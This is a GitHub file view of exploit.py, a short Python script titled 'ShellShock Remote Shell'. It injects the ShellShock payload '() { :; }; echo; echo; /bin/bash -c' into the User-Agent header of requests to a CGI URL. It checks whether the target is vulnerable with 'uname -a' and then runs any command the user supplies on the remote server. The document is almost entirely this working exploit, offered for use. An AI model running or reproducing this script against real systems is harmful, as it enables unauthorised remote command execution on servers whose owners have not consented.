-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathexploit.py
More file actions
executable file
·31 lines (26 loc) · 836 Bytes
/
exploit.py
File metadata and controls
executable file
·31 lines (26 loc) · 836 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
#!/bin/python3
# Title: ShellShock Remote Shell
# Author: EmanuelFirmino
# Tested on: Kali Linux / Parrot OS
import requests
import sys
# Get request with shellshock payload on User-Agent header
def exploit(url, comando):
header = 'User-Agent'
payload = "() { :; }; echo; echo; /bin/bash -c '"
reqest = requests.get(url, headers = {header: payload+comando+"'"})
return reqest.text
def main():
if len(sys.argv) < 0b11:
print(f'\n[*] Usage: ./{sys.argv[0b0]} [http://example.com/path/to/vulnerable/CGI/file] [Command] [*]')
sys.exit()
try:
expl0it = exploit(sys.argv[0b1], 'uname -a')
if 'Linux' not in expl0it:
print("\n[*] Not vulnerable! [*]"); sys.exit()
print(exploit(sys.argv[0b1], sys.argv[0b10]))
except KeyboardInterrupt:
print('\n[*] Exiting... [*]')
sys.exit()
if __name__ == '__main__':
main()